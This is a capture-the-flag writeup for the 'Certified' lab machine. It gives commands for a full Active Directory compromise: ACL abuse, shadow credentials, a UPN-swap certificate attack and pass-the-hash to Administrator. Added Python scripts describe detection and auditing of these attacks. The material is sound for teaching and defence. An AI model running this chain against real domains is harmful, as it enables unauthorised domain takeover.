This writeup walks through Certified, a medium-difficulty Capture The Flag (CTF) machine. It keeps the commands and the key concepts straightforward so that players at this level can follow each step.

Add Hosts

10.10.11.41 certified.htb

Script to add the hosts entry automatically (only appends it if it is not already present):

ip="10.10.11.41"
domain="certified.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV certified.htb
Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.050s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-07 08:07:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-07T08:08:20
|_  start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Provided Credentials:

  • User: judith.mader
  • Password: judith09

Run BloodHound Data Collection:

bloodhound-python -d certified.htb -c All -ns 10.10.11.41 --zip -u judith.mader -p judith09 --use-ldap

Resolving Clock Skew Issues

Synchronize System Time:

  • Check current time offset using NTP:
ntpdate -q 10.10.11.41

Adjust Time for Commands:

  • Define a function that runs a command under libfaketime with the clock shifted by the DC's offset (requires libfaketime; the awk/sed pipeline pulls the "offset" value out of the ntpdate -q output):
fakedate() {
    # Offset in seconds between the local clock and the DC, as reported by ntpdate -q
    local offset
    offset="$(ntpdate -q 10.10.11.41 | awk '/offset/ {print $10}' | sed 's/,$//')"
    # Run the command with a fake wall-clock time shifted by that offset
    /usr/bin/faketime "$(date -d "$(date) ${offset} seconds" "+%Y-%m-%d %H:%M:%S")" "$@"
}

Execute Time-Sensitive Command:

  • Run the Kerberos-related command with correct timing:
fakedate GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request

Note: there is no need to crack the returned hash; the request is only run to confirm that the clock-adjusted Kerberos command works.

Privilege Escalation

Set Judith as Owner of Management Group:

bloodyad --host 10.10.11.41 -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

Grant Judith Write Permissions for Management Members:

dacledit.py 'certified.htb/judith.mader:judith09' -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'

Add Judith to the Management Group:

net rpc group addmem "Management" "judith.mader" -I 10.10.11.41 -U 'certified.htb\judith.mader%judith09'
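The three commands above walk a chain of control rights: ownership of the group, then a DACL edit granting WriteMembers, then group membership. As an added example that is not part of this writeup and is not BloodHound's code, the script below is a minimal path finder over a constructed ACE list modelled on that kind of chain (WriteOwner on a group, a write right from the group to a service account, full control from that account onward). The account names echo the box, but every ACE, the `helpdesk` principal and the privileged-group list are constructed for the demonstration; the point is the audit view a defender wants, namely which control rights sit with non-privileged principals and which objects they reach.

```python
# Added example: a minimal ACL path finder over a constructed set of Active
# Directory ACEs. Not BloodHound code; the ACE list and names are invented.
from collections import deque

# Rights that let the holder take control of the target object. WriteOwner and
# WriteDacl count because an owner can rewrite the DACL and a DACL writer can
# grant themselves any other right; AddMember on a group yields membership.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                  "AddMember", "Owns"}

# Constructed ACE list: (principal, right, target). Group membership is modelled
# as a "MemberOf" edge so rights granted to a group flow to its members.
SAMPLE_ACES = [
    ("judith.mader", "WriteOwner", "Management"),
    ("Management", "GenericWrite", "management_svc"),
    ("management_svc", "GenericAll", "ca_operator"),
    ("Domain Admins", "GenericAll", "ca_operator"),   # expected: privileged holder
    ("helpdesk", "MemberOf", "Management"),           # constructed extra principal
]
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}


def build_graph(aces):
    """Adjacency list principal -> [(right, target)] over control rights and membership."""
    graph = {}
    for principal, right, target in aces:
        if right in CONTROL_RIGHTS or right == "MemberOf":
            graph.setdefault(principal, []).append((right, target))
    return graph


def find_control_path(aces, start, goal):
    """Breadth-first search from `start`. Returns the shortest list of
    (principal, right, target) hops by which `start` ends up controlling `goal`,
    or None when no chain exists."""
    graph = build_graph(aces)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, target in graph.get(node, []):
            if target not in seen:
                seen.add(target)
                queue.append((target, path + [(node, right, target)]))
    return None


def risky_aces(aces, privileged=PRIVILEGED):
    """Control rights held by principals outside the privileged set: the ACEs a
    reviewer should justify or remove."""
    return [(p, r, t) for p, r, t in aces
            if r in CONTROL_RIGHTS and p not in privileged]


if __name__ == "__main__":
    for principal, right, target in find_control_path(SAMPLE_ACES, "judith.mader", "ca_operator"):
        print(f"{principal} -[{right}]-> {target}")
    print("ACEs to review:", risky_aces(SAMPLE_ACES))
```

Run against real data this is what the BloodHound collection earlier in the writeup produces at scale; the `risky_aces` list is the remediation worklist, since removing any single hop (here the WriteOwner on the group) breaks the whole chain.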

Install PyWhisker and use it to add a certificate-based key credential to management_svc:

git clone https://github.com/0xPreDa/pywhisker
cd pywhisker
pipx ensurepath
pipx install .
pywhisker -d certified.htb --dc-ip 10.10.11.41 -u 'judith.mader' -p 'judith09' -t 'management_svc' --action add
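What PyWhisker writes here, and what certipy's shadow mode writes later in this writeup, is a value on the target's msDS-KeyCredentialLink attribute. As an added example that is not part of the writeup, the script below is the detection logic a defender would run over Windows Security event 5136 ("A directory service object was modified") for that attribute. The event records, the field layout and the allow-list of legitimate writers are constructed for the demonstration; 5136 itself is only generated when Directory Service Changes auditing is enabled and the object's SACL audits writes to the attribute.

```python
# Added example (not from the writeup): shadow-credential detection over a
# constructed batch of event 5136 records. Field layout is simplified.
from dataclasses import dataclass


@dataclass
class DirectoryChange:
    event_id: int
    subject: str        # account that performed the write
    target_dn: str      # object that was modified
    object_class: str   # "user", "computer" or "group"
    attribute: str      # LDAP display name of the changed attribute
    operation: str      # 5136 logs "add" and "delete" of attribute values


# Constructed allow-list: writers expected to touch key credentials, such as the
# domain controllers (device registration) and a device-registration service.
ALLOWED_WRITERS = {"DC01$", "svc_devreg"}

# Constructed events, modelled on the writes the tools in this writeup produce.
SAMPLE_EVENTS = [
    DirectoryChange(5136, "DC01$", "CN=WS01,OU=Workstations,DC=example,DC=local",
                    "computer", "msDS-KeyCredentialLink", "add"),
    DirectoryChange(5136, "judith.mader", "CN=Management,CN=Users,DC=example,DC=local",
                    "group", "member", "add"),
    DirectoryChange(5136, "judith.mader", "CN=management_svc,CN=Users,DC=example,DC=local",
                    "user", "msDS-KeyCredentialLink", "add"),
    DirectoryChange(5136, "management_svc", "CN=ca_operator,CN=Users,DC=example,DC=local",
                    "user", "msDS-KeyCredentialLink", "add"),
    # Clean-up of the value after use also leaves a trace.
    DirectoryChange(5136, "management_svc", "CN=ca_operator,CN=Users,DC=example,DC=local",
                    "user", "msDS-KeyCredentialLink", "delete"),
]


def shadow_credential_alerts(events, allowed=ALLOWED_WRITERS):
    """Return (subject, target_dn, operation) for every msDS-KeyCredentialLink
    change on a user object made by a writer outside the allow-list.

    Legitimate key credentials on user objects come from Windows Hello for
    Business enrolment and are normally written by the DC or a registration
    service; a value added to a user by another ordinary account is the
    pattern behind PyWhisker and certipy shadow."""
    alerts = []
    for ev in events:
        if ev.event_id != 5136:
            continue
        if ev.attribute.lower() != "msds-keycredentiallink":
            continue
        if ev.object_class != "user" or ev.subject in allowed:
            continue
        alerts.append((ev.subject, ev.target_dn, ev.operation))
    return alerts


if __name__ == "__main__":
    for subject, target, op in shadow_credential_alerts(SAMPLE_EVENTS):
        print(f"ALERT msDS-KeyCredentialLink {op} on {target} by {subject}")
```

The allow-list is the tuning knob: in a domain with no Windows Hello for Business or device registration, every write to this attribute on a user object deserves a look, and the matching "delete" a few minutes later is a second indicator rather than a reason to dismiss the first.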

If PyWhisker fails with "[!] Unsupported hash type MD4", it is because OpenSSL 3 ships MD4 in its legacy provider, which is disabled by default. Enable the legacy provider to resolve this:

  1. Edit OpenSSL config:

    sudo nano /etc/ssl/openssl.cnf

  2. Add the following to enable MD4:

    [provider_sect]
    default = default_sect
    legacy = legacy_sect

    [default_sect]
    activate = 1

    [legacy_sect]
    activate = 1

For more info, see this GitHub issue.

Get TGT Using PKINIT (the PFX and its password are the ones PyWhisker generated):

fakedate gettgtpkinit -cert-pfx $(pwd)/<file>.pfx -pfx-pass '<psw>' -dc-ip 10.10.11.41 certified.htb/management_svc management_svc.ccache

Set ccache and Retrieve NT Hash (the -key value is the AS-REP encryption key that gettgtpkinit prints):

export KRB5CCNAME=management_svc.ccache
fakedate getnthash certified.htb/management_svc -key <key>
  • Result: NT hash for management_svc is a091c1832bcdd4677c28b5a6a1295584.
evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Retrieve User Flag

type \users\management_svc\desktop\user.txt

Take over ca_operator from management_svc: the DACL (Discretionary Access Control List) on ca_operator grants management_svc full control, so a shadow credential can be added and the NT hash recovered.

fakedate certipy shadow auto -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
  • Result: NT hash for ca_operator is b4b86f45c6018f1b664f70805f45d8f2.

Update UPN for ca_operator:

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator

Request a certificate as ca_operator; because its UPN now reads Administrator, the issued certificate maps to the Administrator account:

certipy req -username 'ca_operator@certified.htb' -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug

Restore UPN for ca_operator:

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn "ca_operator@certified.htb"

Authenticate as Administrator:

fakedate certipy auth -pfx administrator.pfx -domain "certified.htb"
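The sequence from "Update UPN for ca_operator" to this authentication step leaves a characteristic trail in the Security log: a user-account change that sets the UPN to another account's name, a certificate issued to that user, and a second change putting the UPN back. As an added example that is not part of the writeup, the script below correlates those records. Event 4738 ("A user account was changed") carries the old and new User Principal Name and 4887 ("Certificate Services approved a certificate request and issued a certificate") names the requester; the records, the field names and the account list are constructed for the demonstration.

```python
# Added example (not from the writeup): correlating a UPN change with a
# certificate issued to the renamed account, over constructed log records.
from datetime import datetime, timedelta

# Constructed sAMAccountNames of the domain. A new UPN whose user part names one
# of these while being set on a *different* account is a collision.
ACCOUNTS = {"administrator", "ca_operator", "management_svc", "judith.mader", "j.smith"}

SAMPLE_EVENTS = [
    {"id": 4738, "ts": "2024-11-07T08:20:01", "subject": "management_svc",
     "target": "ca_operator", "upn_old": "ca_operator@example.local",
     "upn_new": "Administrator"},
    {"id": 4887, "ts": "2024-11-07T08:20:40", "requester": "ca_operator",
     "template": "CertifiedAuthentication"},
    {"id": 4738, "ts": "2024-11-07T08:21:15", "subject": "management_svc",
     "target": "ca_operator", "upn_old": "Administrator",
     "upn_new": "ca_operator@example.local"},
    # A routine rename: the new UPN does not name another account.
    {"id": 4738, "ts": "2024-11-07T09:00:00", "subject": "hr_admin",
     "target": "j.smith", "upn_old": "jsmith@example.local",
     "upn_new": "john.smith@example.local"},
]


def upn_collides(upn_new, target, accounts):
    """True when the user part of the new UPN is an existing account other than target."""
    user_part = upn_new.split("@", 1)[0].lower()
    return user_part in accounts and user_part != target.lower()


def upn_swap_alerts(events, accounts=ACCOUNTS, window=timedelta(minutes=30)):
    """For each colliding UPN change, look ahead within `window` for a certificate
    issued to the renamed account and for the UPN being put back.
    Returns one alert dict per colliding change."""
    events = sorted(events, key=lambda e: e["ts"])  # ISO-8601 strings sort chronologically
    alerts = []
    for i, ev in enumerate(events):
        if ev["id"] != 4738 or not upn_collides(ev.get("upn_new", ""), ev["target"], accounts):
            continue
        t0 = datetime.fromisoformat(ev["ts"])
        cert_issued = reverted = False
        for later in events[i + 1:]:
            if datetime.fromisoformat(later["ts"]) - t0 > window:
                break
            if later["id"] == 4887 and later["requester"].lower() == ev["target"].lower():
                cert_issued = True
            if (later["id"] == 4738 and later["target"] == ev["target"]
                    and later.get("upn_new", "").lower() == ev["upn_old"].lower()):
                reverted = True
        alerts.append({
            "target": ev["target"],
            "impersonated": ev["upn_new"].split("@", 1)[0],
            "changed_by": ev["subject"],
            "cert_issued": cert_issued,
            "reverted": reverted,
        })
    return alerts


if __name__ == "__main__":
    for alert in upn_swap_alerts(SAMPLE_EVENTS):
        print("ALERT", alert)
```

The colliding UPN change is alert-worthy on its own; the certificate and the revert raise its confidence. On the mitigation side, this path depends on the KDC mapping the certificate by UPN alone, which is what Microsoft's strong certificate mapping (KB5014754, the SID extension with StrongCertificateBindingEnforcement set to full enforcement) removes.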

Execute Remote Command as Administrator:

psexec.py administrator@certified.htb -hashes :0d5b49608bbce1751f708748f67e2d34

Retrieve Root Flag

type \users\administrator\desktop\root.txt